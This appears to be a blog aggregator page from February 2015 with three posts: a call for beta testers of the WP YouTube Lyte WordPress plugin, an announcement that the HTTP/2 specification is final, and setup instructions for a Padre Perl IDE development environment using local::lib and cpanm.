February 18, 2015

Frank Goossens

Wanted: testers for WP YouTube Lyte (the one with the new YT API)

As I wrote a couple of weeks ago, YouTube is shutting down their old v2 API, forcing WP YouTube Lyte to swith to v3. The main change; users will have to get an API key from Google and provide that in the Lyte settings page.

Initial development & testing has been done (this blog switched already) and I now need some brave souls to test this. You can download the “beta” from https://downloads.wordpress.org/plugin/wp-youtube-lyte.zip and report back here or on the wordpress.org support forum about how that did or did not work for you.

Looking forward to having to fix some nasty bugs until everything will finally be in it’s right place once again ;-)

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at February 18, 2015 04:25 PM

Mattias Geniar

HTTP/2 Specification Is Final

The post HTTP/2 Specification Is Final appeared first on ma.ttias.be.

February 18th, 2015. A day that, for better or worse, will change the internet.

The IESG has formally approved the HTTP/2 and HPACK specifications, and they’re on their way to the RFC Editor, where they’ll soon be assigned RFC numbers, go through some editorial processes, and be published.
mnot.net

This means HTTP/2 has been finalised and the spec is ready to be implemented.

Here are a few things to read up on, in case you're new to the HTTP/2 protocol.

I for one am happy to see HTTP/2 be finalised. There are some really good parts about the spec. Yes, it's lacking in some areas -- but it's by far an improvement over the HTTP/1.1 spec.

The post HTTP/2 Specification Is Final appeared first on ma.ttias.be.

by Mattias Geniar at February 18, 2015 07:05 AM

February 17, 2015

Claudio Ramirez

Build the Padre development tree using local::lib on Debian/Ubuntu

Thanks to the great job of Kaare Rasmussen (kaare) and Kevin Dawson (bowtie) moving the Padre repository from a stalled svn/trac setup to github (and keeping the repo alive), hopefully development can be rebooted.

I posted a small howto about setting up a development environment to hack on Padre (svn), but it’s already outdated due to the new libraries that Linux distros now package (gtk3, wx 3.0.1, etc.). The fastest way I found to set up a Padre environment is using local::lib (https://metacpan.org/pod/local::lib).

Because recent Linux distributions have recent Perl and Padre packages, you won’t be working with ancient packages. E.g., Ubuntu 14.10 comes with Perl 5.20.1 and Padre 1.0 (this is also valid for Debian Testing/Unstable). Kudos to the Debian Perl Group (https://pkg-perl.alioth.debian.org/).

These instructions are provided for building a development environment to hack on Padre itself or to keep track of the most recent changes on github.

These are the steps to get Padre from github (clone the Padre repository first; the cpanm commands below are run from the top of the cloned working copy):

  • Get the OS dependencies. The easiest way is just to install the packaged padre. Its dependencies include local::lib:
    $ sudo apt-get install padre

The OS-packaged Padre can of course be started by just typing:

$ padre

  • Get development dependencies for Padre:
    $ cpanm -l ~/perl5 Module::Install
  • Install Padre and dependencies:
    $ cpanm -l ~/perl5 .
  • Run Padre:
    – in dev mode:
    $ ./dev
    – or the local::lib installed app:
    $ ~/perl5/bin/padre

Filed under: Uncategorized Tagged: github, local::lib, Padre, Perl

by claudio at February 17, 2015 10:16 PM